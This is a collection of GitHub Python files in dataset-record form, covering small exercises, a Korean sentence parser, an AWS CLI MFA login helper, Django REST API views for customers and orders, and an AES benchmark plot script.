main()\n","repo_name":"Nasan4ik228/Projects","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":9657,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27203538781","text":"class TennisGame:\n def __init__(self, player1_name, player2_name):\n self.player1_name = player1_name\n self.player2_name = player2_name\n self.player1_score = 0\n self.player2_score = 0\n self.point_term = {0:\"Love\",1:\"Fifteen\",2:\"Thirty\",3:\"Forty\"}\n\n def won_point(self, player_name):\n if player_name == \"player1\":\n self.player1_score = self.player1_score + 1\n else:\n self.player2_score = self.player2_score + 1\n\n def get_score(self):\n if self.player1_score == self.player2_score:\n #if equal on points\n if self.player1_score in self.point_term:\n return self.point_term[self.player1_score] + \"-All\"\n else:\n return \"Deuce\"\n elif self.player1_score >= 4 or self.player2_score >= 4:\n #if either player could have won or is in a position to win\n return self.score_difference(self.player1_score,self.player2_score) \n else:\n #normal play\n return self.point_term[self.player1_score] + \"-\" + self.point_term[self.player2_score]\n \n def score_difference(self, score1, score2):\n difference_for_player1 = score1-score2\n if difference_for_player1 == 1:\n return \"Advantage player1\"\n elif difference_for_player1 == -1:\n return \"Advantage player2\"\n elif difference_for_player1 >= 2:\n return \"Win for player1\"\n else:\n return \"Win for player2\"","repo_name":"oskari83/ohjelmistotuotanto","sub_path":"viikko5/tennis/src/tennis_game.py","file_name":"tennis_game.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30922697813","text":"import unittest\nimport pandas\nimport pandas.testing as test\nfrom shapercore.Visitor.MetaClass.Dataframe 
import Dataframe\nfrom shapercore.Modules.natural_language.nltk.lowercase import Tokenizer\n\n\nclass LowercaseTest(unittest.TestCase):\n\n def test_unit(self):\n column = \"test_column\"\n test_data = pandas.DataFrame({column: [\"Test String\", \"anothertest string\", \"Another test string\", \"test\"]})\n verify_data = pandas.DataFrame({column: [[\"Test\", \"String\"], [\"anothertest\", \"string\"],\n [\"Another\", \"test\", \"string\"], [\"test\"]]})\n test_featureset = Dataframe()\n verify_featureset = Dataframe()\n test_featureset.set_dataframe(test_data)\n verify_featureset.set_dataframe(verify_data)\n visitor = Tokenizer(column)\n visitor.visit(test_featureset)\n test.assert_frame_equal(test_featureset.get_dataframe(), verify_featureset.get_dataframe())\n","repo_name":"MarcelHimmelreich/shaperML","sub_path":"shapercore/ModulesUnitTest/natural_language/tokenizer_test.py","file_name":"tokenizer_test.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35731438804","text":"import re, json\nfrom pprint import pprint, pformat\nfrom datetime import datetime\n\nfrom tagmap import TagMap\nfrom chunker import Chunker\nfrom definition import getWordDefs\n\nfrom konlpy.tag import Kkma\n\ndef buildParseTree(chunkTree, showAllLevels=False):\n \"constructs display structures from NLTK chunk-tree\"\n # first, recursively turn the chunk tree into a Python nested dict so it can be JSONified\n # gathering terminals list & adding level from root & parent links along the way\n terminals = []; height = [0]; allNodes = []; nodeIDs = {}\n def asDict(chunk, parent=None, level=0, isLastChild=False):\n height[0] = max(height[0], level)\n if not showAllLevels:\n # elide degenerate tree nodes (those with singleton children)\n while isinstance(chunk, nltk.Tree) and len(chunk) == 1:\n chunk = chunk[0]\n if isinstance(chunk, nltk.Tree):\n tag = chunk.label()\n # ad-hoc label mappings\n if tag == 'S':\n tag = 'Sentence'\n elif tag == 'Predicate' and not isLastChild:\n tag = 'Verb Phrase'\n # build tree node\n node = dict(type='tree', tag=tag, level=level, layer=1, parent=parent)\n node['children'] = [asDict(c, node, level+1, isLastChild=i == len(chunk)-1) for i, c in enumerate(chunk)]\n nodeID = nodeIDs.get(id(node))\n if not nodeID:\n nodeIDs[id(node)] = nodeID = len(nodeIDs) + 1\n node['id'] = nodeID\n allNodes.append(node)\n return node\n else:\n word = chunk[0].strip()\n tag = chunk[1]\n tm = TagMap.POS_labels.get(word + \":\" + tag)\n tagLabel = (tm.posLabel if tm else TagMap.partsOfSpeech.get(tag)[0]).split('\\n')\n node = dict(type='word', word=word, tag=tag, tagLabel=tagLabel, children=[], parent=parent, level=-1, layer=0)\n nodeID = nodeIDs.get(id(node))\n if not nodeID:\n nodeIDs[id(node)] = nodeID = len(nodeIDs) + 1\n node['id'] = nodeID\n terminals.append(node)\n allNodes.append(node)\n return node\n tree = asDict(chunkTree)\n\n\ndef parse():\n \"parse POSTed Korean sentence\"\n # grab sentence to parse\n input = request.form.get('sentence')\n if not input:\n return jsonify(result=\"FAIL\", msg=\"Missing input sentence(s)\")\n showAllLevels = request.form.get('showAllLevels') == 'true'\n\n # parse input & return parse results to client\n sentences = parseInput(input, parser=\"RD\", showAllLevels=showAllLevels)\n\n return jsonify(result=\"OK\",\n sentences=sentences)\n\ndef parseInput(input, parser=\"RD\", showAllLevels=False, getWordDefinitions=True):\n \"parse input string into list of parsed 
contained sentence structures\"\n # parser can be RD for recusrsive descent (currently the most-developed) or \"NLTK\" for the original NLTK chunking-grammar parser\n\n # clean & build a string for the KHaiii phoneme analyzer\n input = input.strip()\n if input[-1] not in ['.', '?', '!']:\n input += '.'\n input = re.sub(r'\\s+([\\.\\?\\;\\,\\:])', r'\\1', input) # elide spaces preceding clause endings, throws Khaiii off\n # input = input.replace(',', ' , ').replace(';', ' ; ').replace(':', ' : ') - adding a space before punctuation seems to mess tagging in Khaiii\n print(\"* parse {0}\".format(input))\n\n # run Khaiii, grab the parts-of-speech list it generates (morphemes + POS tags) and extract original word-to-morpheme groupings\n sentences = [] # handle possible multiple sentences\n posList = []; morphemeGroups = []\n kkma_parser = Kkma()\n\n for w in input.split(\" \"):\n morphs = kkma_parser.pos(w)\n morphemeGroups.append([w, [m[0] for m in morphs if m[1] != 'SF']])\n for m in morphs:\n tag = m[1]\n if tag == \"ETD\" :\n tag = \"ETM\"\n if tag == \"EFN\" :\n tag = \"EF\"\n posList.append('{0}:{1}'.format(m[0].strip(), tag))\n if m[1] == 'SF':\n # sentence end, store extractions & reset for possible next sentence\n sentences.append(dict(posList=posList, morphemeGroups=morphemeGroups, posString=';'.join(posList)))\n posList = []; morphemeGroups = []\n\n for s in sentences:\n # map POS through synthetic tag mapper & extract word groupings\n mappedPosList, morphemeGroups = TagMap.mapTags(s['posString'], s['morphemeGroups']) #, disableMapping=True)\n print(\" {0}\".format(s['posString']))\n print(\" mapped to {0}\".format(mappedPosList))\n\n if parser == \"NLTK\": # NLTK chunking parser\n # perform chunk parsing\n chunkTree = Chunker.parse(mappedPosList, trace=2)\n chunkTree.pprint()\n # apply any synthetic-tag-related node renamings\n TagMap.mapNodeNames(chunkTree)\n # extract popup wiki definitions & references links & notes for implicated nodes\n references = TagMap.getReferences(chunkTree)\n # build descriptive phrase list\n phrases = Chunker.phraseList(chunkTree)\n #\n parseTreeDict = buildParseTree(chunkTree, showAllLevels=showAllLevels)\n\n else: # recursive-descent parser\n from rd_grammar import KoreanParser\n parser = KoreanParser([\":\".join(p) for p in mappedPosList])\n parseTree = parser.parse(verbose=0)\n print(\"parse tree : \", parseTree)\n if parseTree:\n # apply any synthetic-tag-related node renamings\n parseTree.mapNodeNames()\n # extract popup wiki definitions & references links & notes for implicated nodes\n references = parseTree.getReferences()\n # build descriptive phrase list\n phrases = parseTree.phraseList()\n # get noun & verb translations from Naver\n wordDefs = getWordDefs(mappedPosList) if getWordDefinitions else {}\n print(mappedPosList)\n print(\"word definitions :\\n\", wordDefs)\n # build JSONable parse-tree dict\n parseTreeDict = parseTree.buildParseTree(wordDefs=wordDefs, showAllLevels=showAllLevels)\n print(\" {0}\".format(parseTree))\n else:\n # parsing failed, return unrecognized token\n parseTree = references = parseTreeDict = phrases = None\n s.update(dict(error=\"Sorry, failed to parse sentence\",\n lastToken=parser.lastTriedToken()))\n print(\" ** failed. 
Unexpected token {0}\".format(parser.lastTriedToken()))\n\n # format debugging daat\n debugging = dict(posList=pformat(s['posList']),\n mappedPosList=pformat(mappedPosList),\n phrases=pformat(phrases),\n morphemeGroups=pformat(morphemeGroups),\n parseTree=pformat(parseTreeDict),\n references=references)\n\n # add parsing results to response structure\n s.update(dict(mappedPosList=mappedPosList,\n morphemeGroups=morphemeGroups,\n parseTree=parseTreeDict,\n references=references,\n phrases=phrases,\n debugging=debugging\n ))\n #\n return sentences","repo_name":"taherromdhane/SD213-project-simple-korean-parser","sub_path":"Parse.py","file_name":"Parse.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13172501547","text":"import re\n\nfrom my_utils import is_line_valid\n\n\ndef print_sent_gigabytes():\n sent_bytes = sum_sent_bytes()\n sent_gigabytes = bytes_to_gigabytes(sent_bytes)\n print(f\"{sent_gigabytes}GB\")\n\n\ndef sum_sent_bytes():\n total_bytes = 0\n\n while True:\n try:\n line = input()\n\n if not is_line_valid(line):\n raise ValueError(\"Invalid line\")\n elif re.search(r\" \\d+$\", line):\n total_bytes += int(line.split()[-1])\n\n except EOFError:\n break\n\n return total_bytes\n\n\ndef bytes_to_gigabytes(b):\n return round(b * (10 ** -9), 2)\n\n\nif __name__ == '__main__':\n print_sent_gigabytes()\n","repo_name":"Ptaku09/ScriptLanguages","sub_path":"Lab2/lab_3_b.py","file_name":"lab_3_b.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40694744355","text":"#!/usr/bin/env python3\nimport math\n\n# 本机运行正确,在leetcode上运行不正确。可能是python版本问题\n#\n\n\nclass ListNode(object):\n def __init__(self, val):\n self.val = val\n self.next = None\n\nclass Solution(object):\n def bucket_sort(self, array):\n \"\"\"\n :param array: list[float] or list[(float, ...)] unsorted-array\n :return: list[float] or list[(float, ...)] sorted-array\n \"\"\"\n n = len(array)\n linkArray = [ListNode(-1) for i in range(n)]\n result = []\n\n if isinstance(array[0], int): #根据是否附带卫星数据分情况\n for i in range(n):\n index = math.floor(n * array[i])\n newNode = ListNode(array[i])\n cur = linkArray[index]\n while cur.next:\n if cur.next.val >= array[i]:\n newNode.next = cur.next\n cur.next = newNode\n break\n cur = cur.next\n else:\n cur.next = newNode\n\n for i in range(len(linkArray)):\n if linkArray[i].next:\n cur = linkArray[i].next\n while cur:\n result.append(cur.val)\n cur = cur.next\n else:\n for i in range(n):\n index = int(math.floor(n * array[i][0]))\n newNode = ListNode(array[i])\n cur = linkArray[index]\n while cur.next:\n if cur.next.val[0] >= array[i][0]:\n newNode.next = cur.next\n cur.next = newNode\n break\n cur = cur.next\n else:\n cur.next = newNode\n\n for i in range(len(linkArray)):\n if linkArray[i].next:\n cur = linkArray[i].next\n while cur:\n result.append(cur.val)\n cur = cur.next\n\n return result\n\n def bucket_sort_pretreatment(self, array):\n new_array = []\n\n if isinstance(array[0], int):\n maxNum = max(array)\n minNum = min(array)\n length = maxNum - minNum + 1\n new_array = [((x-minNum)/length, x) for x in array]\n else:\n maxNum = max([x[0] for x in array])\n minNum = min([x[0] for x in array])\n length = maxNum - minNum + 1\n new_array = [((x[0]-minNum)/length, x) for x in array]\n\n return new_array\n\n def maximumGap(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n 
\"\"\"\n if not nums or len(nums) < 2:\n return 0\n\n result = [x[1] for x in self.bucket_sort(self.bucket_sort_pretreatment(nums))]\n gap = 0\n for i in range(1, len(result)):\n if result[i] - result[i-1] > gap:\n gap = result[i] - result[i-1]\n\n return gap\n\ns = Solution()\nprint(s.maximumGap([1,10000000]))\n","repo_name":"vNKB7/leetcode","sub_path":"python/164_Maximum_Gap.py","file_name":"164_Maximum_Gap.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13426074475","text":"ex_input = 'GATGGAACTTGACTACGTAAATT'\n\ninput_file = 'Data/rosalind_rna.txt'\nwith open(input_file) as f:\n data = f.readline()\ndata = data.strip()\n\ndef DNAtoRNA(data):\n data = list(data)\n for i in range(0, len(data)):\n if data[i] == 'T':\n data[i] = 'U'\n rna_data = ''\n return rna_data.join(data)\n\nprint(DNAtoRNA(ex_input))\n\nprint(DNAtoRNA(data))\n","repo_name":"GeniaHarrietBoeing/Rosalind","sub_path":"DNAtoRNA.py","file_name":"DNAtoRNA.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37397132532","text":"from Problem27 import primes\r\n\r\nNUMBERS = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\r\n\r\ndef ispandigital(i):\r\n \"\"\"\r\n Checks if string i is a pandigital number\r\n \"\"\"\r\n # If too long it returns false\r\n if len(i) > 10:\r\n return False\r\n\r\n # Loops through all numbers below the lenth of the string\r\n for j in range(len(i)):\r\n if NUMBERS[j] in i:\r\n continue\r\n else:\r\n # Returns false if one of the numbers is missing\r\n return False\r\n \r\n # Returns True if all tests pass\r\n return True\r\n\r\n# Loops though primes below 10 million until pandigital is found\r\nreversedprimes = reversed([_ for _ in primes(10000000)])\r\nfor i in reversedprimes:\r\n if ispandigital(str(i)):\r\n # Prints out answer\r\n print(i)\r\n break","repo_name":"chrisvail/Project_Euler","sub_path":"Problem41.py","file_name":"Problem41.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2788862059","text":"# -*- coding:utf-8 -*-\n\n\"\"\" 输入一棵二叉搜索树,将该二叉搜索树转换成一个排序的双向链表。要求不能创建任何新的结点,只能调整树中结点指针的指向。 \"\"\"\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n node_list = []\n\n def Convert(self, pRootOfTree):\n self.node_list = []\n if pRootOfTree:\n self.scan_tree(pRootOfTree)\n self.change_pointers()\n return self.node_list[0] if self.node_list else None\n\n def scan_tree(self, root):\n \"\"\" 扫描当前树,将其按中序遍历顺序添加到node list列表中 \"\"\"\n if root.left:\n self.scan_tree(root.left)\n self.node_list.append(root)\n if root.right:\n self.scan_tree(root.right)\n\n def change_pointers(self):\n \"\"\" 调整指针指向 \"\"\"\n nodes = [None]\n nodes.extend(self.node_list)\n nodes.append(None)\n for last, this, next in zip(nodes[:-2], nodes[1:-1], nodes[2:]):\n this.left = last\n this.right = next\n","repo_name":"GoogleGu/leetcode","sub_path":"offer/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"69895641204","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(-4, 4, 6)\nprint('x = ' , x)\ny = np.linspace(-4, 4, 6)\nprint('y = ', y)\nX, Y = np.meshgrid(x, y)\nprint('X = ', X)\nprint('Y = ', 
Y)\nU = X + Y\nprint('U = ', U)\nV = Y - X\nprint('V = ', V)\n\nfig, ax = plt.subplots()\nax.quiver(X, Y, U, V, color=\"C0\", angles='xy', scale_units='xy', scale=5, width=.015)\nax.set(xlim=(-5, 5), ylim=(-5, 5))\nplt.show()","repo_name":"camihurs/PensamientoComputacional","sub_path":"PruebaQuiver.py","file_name":"PruebaQuiver.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8181523966","text":"from typing import Any, Type\n\nfrom aiohttp.client import ClientSession\n\nfrom pydantic_client.clients.abstract_client import AbstractClient\nfrom pydantic_client.proxy import AsyncClientProxy, Proxy\nfrom pydantic_client.schema.http_request import HttpRequest\n\n\nclass AIOHttpClient(AbstractClient):\n runner_class: Type[Proxy] = AsyncClientProxy\n\n def __init__(self, base_url: str):\n self.base_url = base_url.rstrip(\"/\")\n\n async def do_request(self, request: HttpRequest) -> Any:\n data, json = self.parse_request(request)\n async with ClientSession() as session:\n try:\n req = session.request(\n url=self.base_url + request.url,\n method=request.method,\n json=json,\n data=data\n )\n\n async with req as resp:\n resp.raise_for_status()\n if resp.status == 200:\n return resp.json()\n except BaseException as e:\n raise e\n","repo_name":"ponytailer/pydantic-client","sub_path":"pydantic_client/clients/aiohttp.py","file_name":"aiohttp.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"39754312129","text":"#!/usr/bin/env python3\n\n# Follows the directions from AWS on using MFA with CLI:\n# https://aws.amazon.com/premiumsupport/knowledge-center/authenticate-mfa-cli/\n\n# That means: call STS with an ARN and an MFA token,\n# with the response, populate an MFA section in aws creds file\n\n\nimport os\nimport json\nimport configparser\nimport argparse\n\nfrom pathlib import Path\n\n\ndef parse_cli_args():\n argparser = argparse.ArgumentParser(prog='aws-cli-mfa', description='Login to AWS CLI using MFA token with STS')\n\n argparser.add_argument('profile_arn', metavar='profile-arn',\n help='the AWS ARN for your MFA profile')\n argparser.add_argument('mfa_token', metavar='mfa-token',\n help='the MFA token from your authenticator app for the MFA profile your ARN is for')\n argparser.add_argument('-p', '--aws-profile',\n help='AWS profile to use when contacting STS to get MFA credentials')\n argparser.add_argument('-s', '--aws-creds-mfa-section', default='mfa',\n help='section to save MFA credentials to in AWS credentials file (default: mfa)')\n argparser.add_argument('-f', '--aws-creds-file', default=str(Path.home())+'/.aws/credentials',\n help='file path to AWS credentials file (default: ~/.aws/credentials)')\n argparser.add_argument('-e', '--aws-env-vars', action='store_true',\n help='export/set AWS access/secret/session env vars instead of updating creds file')\n argparser.add_argument('-x', '--no-export-profile', action='store_true',\n help='do not export/set AWS_PROFILE to the one generated by STS')\n argparser.add_argument('-d', '--lifetime-duration', type=int,\n help='set the time, in seconds, that the access should last (default 12 hours)')\n\n return argparser.parse_args()\n\n\ndef gen_sts_cmd(cli_args):\n sts_args = []\n\n if cli_args.aws_profile:\n sts_args.append(f'--profile {cli_args.aws_profile}')\n\n sts_args.append(f'--serial-number {cli_args.profile_arn}')\n 
sts_args.append(f'--token-code {cli_args.mfa_token}')\n\n if cli_args.lifetime_duration:\n sts_args.append(f'--duration-seconds {cli_args.lifetime_duration}')\n\n return f\"aws sts get-session-token {' '.join(sts_args)}\"\n\n\ndef write_config(creds_file, mfa_profile_section, creds):\n config = configparser.ConfigParser()\n config.read(creds_file)\n\n config[mfa_profile_section] = creds\n\n with open(creds_file, 'w') as configfile:\n config.write(configfile)\n\n\ndef apply_sts_json(\n sts_json,\n use_env_vars,\n creds_file,\n mfa_profile_section,\n export_profile\n ):\n\n envvars = {}\n creds = {\n 'AWS_ACCESS_KEY_ID': sts_json[\"Credentials\"][\"AccessKeyId\"],\n 'AWS_SECRET_ACCESS_KEY': sts_json[\"Credentials\"][\"SecretAccessKey\"],\n 'AWS_SESSION_TOKEN': sts_json[\"Credentials\"][\"SessionToken\"],\n }\n\n if use_env_vars:\n envvars = creds.copy()\n else:\n write_config(creds_file, mfa_profile_section, creds)\n\n if export_profile:\n envvars['AWS_PROFILE'] = mfa_profile_section\n\n return envvars\n\n\ndef build_response():\n response = {}\n\n cli_args = parse_cli_args()\n sts_cmd = gen_sts_cmd(cli_args)\n response['sts_cmd'] = sts_cmd\n\n sts_output = os.popen(sts_cmd).read()\n try:\n sts_json = json.loads(sts_output)\n\n try:\n response['envvars'] = apply_sts_json(\n sts_json,\n cli_args.aws_env_vars,\n cli_args.aws_creds_file,\n cli_args.aws_creds_mfa_section,\n not cli_args.no_export_profile\n )\n except Exception as ex:\n response['output'] = str(ex)\n except:\n response['output'] = sts_output\n\n return response\n\nif __name__ == '__main__':\n print(json.dumps(build_response()))\n","repo_name":"rogusdev/aws-cli-mfa","sub_path":"src/aws_cli_mfa.py","file_name":"aws_cli_mfa.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"6567779516","text":"from queue import Queue\n\n\nclass Node:\n def __init__(self, y, x, dist, sol):\n self.y = y\n self.x = x\n self.dist = dist\n self.sol = sol\n\n\ndef path2exit(maze, x, y):\n height = len(maze)\n width = len(maze[0])\n # print(height, width)\n\n visited = [[False for _ in range(width)] for _ in range(height)]\n q = Queue()\n solutions = []\n q.put(Node(y, x, 0, \"\"))\n while not q.empty():\n node = q.get()\n j = node.y\n i = node.x\n dist = node.dist\n sol = node.sol\n visited[j][i] = True\n\n # print(j, i, maze[y][x], sol)\n if maze[j][i] == '#':\n continue\n\n if maze[j][i] == 'X':\n solutions.append(sol)\n continue\n\n if i - 1 > 0:\n if not visited[j][i-1]:\n q.put(Node(j, i-1, dist + 1, sol + \"L\"))\n if i + 1 < width:\n if not visited[j][i+1]:\n q.put(Node(j, i+1, dist + 1, sol + \"R\"))\n if j - 1 > 0:\n if not visited[j-1][i]:\n q.put(Node(j-1, i, dist + 1, sol + \"U\"))\n if j + 1 < height:\n if not visited[j+1][i]:\n q.put(Node(j+1, i, dist + 1, sol + \"D\"))\n\n # print(solutions)\n if not solutions:\n return -1\n\n shortest = len(solutions[0])\n for i, s in enumerate(solutions):\n if len(s) < shortest:\n shortest = i\n\n return solutions[i]\n\nmaze = [\n '..#.',\n '..#.',\n '...X',]\n\n# maze = ['..X']\n\nprint(path2exit(maze, 0, 0))\n","repo_name":"Gawainus/hse","sub_path":"algo_ds_2/week1/bfs_4.py","file_name":"bfs_4.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28461514663","text":"from ast import Try\nfrom django.http import JsonResponse\nfrom rest_framework.response import Response\nfrom rest_framework.decorators 
import api_view\nfrom rest_framework import status\nfrom .models import Customer, Customer_Order, Product, Order_Item\nfrom .serializer import (\n Customer_Serializer,\n Customer_Order_Serializer,\n Product_Serializer,\n Order_Item_Serializer,\n)\n\n# ---------------------------- Customer ---------------------------------------------------\n\n\n@api_view([\"GET\"])\ndef customers_list_all(request):\n customers = Customer.objects.all()\n serializer = Customer_Serializer(customers, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef customer_create_one(request):\n my_customer = Customer(\n name_cust=request.data[\"name_cust\"],\n email_cust=request.data[\"email_cust\"],\n phone_cust=request.data[\"phone_cust\"],\n address_cust=request.data[\"address_cust\"],\n )\n my_customer.save()\n return JsonResponse(\n f\"The Customer {my_customer.name_cust} was created successfully with id = {my_customer.id}\",\n status=status.HTTP_201_CREATED,\n safe=False,\n )\n\n\n@api_view([\"GET\", \"PUT\", \"DELETE\"])\ndef customer(request, pk):\n try:\n my_customer = Customer.objects.get(pk=pk)\n except Customer.DoesNotExist:\n return Response(\n {\"error\": f\"The Customer with id '{pk}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n if request.method == \"GET\":\n serializer = Customer_Serializer(my_customer)\n return Response(serializer.data)\n\n if request.method == \"PUT\":\n serializer = Customer_Serializer(my_customer, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"DELETE\":\n my_customer.delete()\n return Response(f\"The Customer '{my_customer.name_cust}', with id = {pk}, was deleted successfully\", status=status.HTTP_204_NO_CONTENT)\n\n\n# --------------------------- Customer_Order ---------------------------------------------------\n\n\n@api_view([\"GET\"])\ndef customer_customer_orders_list_all(request, customer_id):\n customer_orders = Customer_Order.objects.filter(\n customer_cust_ord=customer_id)\n serializer = Customer_Order_Serializer(customer_orders, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef customer_order_create_one(request, customer_id):\n try:\n my_customer = Customer.objects.get(pk=customer_id)\n except Customer.DoesNotExist:\n return Response(\n {\"error\": f\"The Customer with id '{customer_id}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n my_new_customer_order = Customer_Order(\n description_cust_ord=request.data[\"description_cust_ord\"],\n status_cust_ord=request.data[\"status_cust_ord\"],\n customer_cust_ord=my_customer,\n )\n my_new_customer_order.save()\n return JsonResponse(\n f\"The Customer Order '{my_new_customer_order.description_cust_ord}' was created successfully for the customer '{my_customer.name_cust}' and id = {my_new_customer_order.id}\",\n status=status.HTTP_201_CREATED,\n safe=False,\n )\n\n\n@api_view([\"GET\", \"PUT\", \"DELETE\"])\ndef customer_order(request, pk):\n try:\n my_customer_order = Customer_Order.objects.get(pk=pk)\n except Customer_Order.DoesNotExist:\n return Response(\n {\"error\": f\"The Customer Order with id = '{pk}' doesn't exist\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n if request.method == \"GET\":\n serializer = Customer_Order_Serializer(my_customer_order)\n return Response(serializer.data)\n\n if request.method == \"PUT\":\n serializer = Customer_Order_Serializer(\n my_customer_order, 
data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"DELETE\":\n my_customer_order.delete()\n return Response(f\"The Customer Order '{my_customer_order.description_cust_ord}' with id = '{pk}' was deleted successfully\", status=status.HTTP_204_NO_CONTENT)\n\n\n# --------------------------- Product ---------------------------------------------------\n\n@api_view([\"GET\"])\ndef products_list_all(request):\n products = Product.objects.all()\n serializer = Product_Serializer(products, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef product_create_one(request):\n my_product = Product(\n name_prod=request.data[\"name_prod\"],\n description_prod=request.data[\"description_prod\"],\n price_prod=request.data[\"price_prod\"],\n quantity_prod=request.data[\"quantity_prod\"],\n )\n my_product.save()\n return JsonResponse(\n f\"The Product '{my_product.name_prod}' was created successfully with id = {my_product.id}\",\n status=status.HTTP_201_CREATED,\n safe=False,\n )\n\n\n@api_view([\"GET\", \"PUT\", \"DELETE\"])\ndef product(request, pk):\n try:\n my_product = Product.objects.get(pk=pk)\n except Product.DoesNotExist:\n return Response(\n {\"error\": f\"The Product with id '{pk}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n if request.method == \"GET\":\n serializer = Product_Serializer(my_product)\n return Response(serializer.data)\n\n if request.method == \"PUT\":\n serializer = Product_Serializer(my_product, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"DELETE\":\n my_product.delete()\n return Response(f\"The Product '{my_product.name_prod}', with id = {pk}, was deleted successfully\", status=status.HTTP_204_NO_CONTENT)\n\n# --------------------------- Order_Item ------------------------------------------\n\n\n@api_view([\"GET\"])\ndef order_order_items_list_all(request, customer_order_id):\n order_order_items = Order_Item.objects.filter(\n order_ord_item=customer_order_id)\n serializer = Order_Item_Serializer(order_order_items, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef order_item_create_one(request, customer_order_id, product_id):\n try:\n my_customer_order = Customer_Order.objects.get(pk=customer_order_id)\n except Customer_Order.DoesNotExist:\n return Response(\n {\"error\": f\"The Customer Order with id '{customer_order_id}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n try:\n my_product = Product.objects.get(pk=product_id)\n except Product.DoesNotExist:\n return Response(\n {\"error\": f\"The Product with id '{product_id}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n my_new_order_item = Order_Item(\n order_ord_item=my_customer_order,\n product_ord_item=my_product,\n price_ord_item=request.data[\"price_ord_item\"],\n quantity_ord_item=request.data[\"quantity_ord_item\"],\n )\n my_new_order_item.save()\n return JsonResponse(\n f\"The Order Item for the product '{my_product.name_prod}' was created successfully for the customer order '{my_customer_order.description_cust_ord}' and id = {my_new_order_item.id}\",\n status=status.HTTP_201_CREATED,\n safe=False,\n )\n\n\n@api_view([\"GET\", \"PUT\", \"DELETE\"])\ndef order_item(request, pk):\n try:\n my_order_item = 
Order_Item.objects.get(pk=pk)\n except Order_Item.DoesNotExist:\n return Response(\n {\"error\": f\"The order item with id = '{pk}' doesn't exist\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n if request.method == \"GET\":\n serializer = Order_Item_Serializer(my_order_item)\n return Response(serializer.data)\n\n if request.method == \"PUT\":\n serializer = Order_Item_Serializer(\n my_order_item, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"DELETE\":\n my_order_item.delete()\n return Response(f\"The Order Item with id = '{pk}' was deleted successfully\", status=status.HTTP_204_NO_CONTENT)\n","repo_name":"rafaelsoteldosilva/django_ordenes_productos","sub_path":"ordenes_productos/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3916924325","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# data collected from TODO : puth excel file path\n\n# AES Results\ncbc_enc_cpb_mean = (2.3685862151, 2.7941152963, 3.1697130095)\ncbc_enc_cpb_stdev = (0.2448099182, 0.3092048224, 0.2204836467)\nctr_cpb_mean = (0.5838479387, 0.6931198856, 0.7955039347)\nctr_cpb_stdev = (0.0484978139, 0.0789836157, 0.1180309327)\ngcm_enc_cpb_mean = (0.6099892252, 0.7089767014, 0.8009293081)\ngcm_enc_cpb_stdev = (0.0702988225, 0.0879610644, 0.0928299511)\ncbc_dec_cpb_mean = (0.6056169963, 0.7036722533, 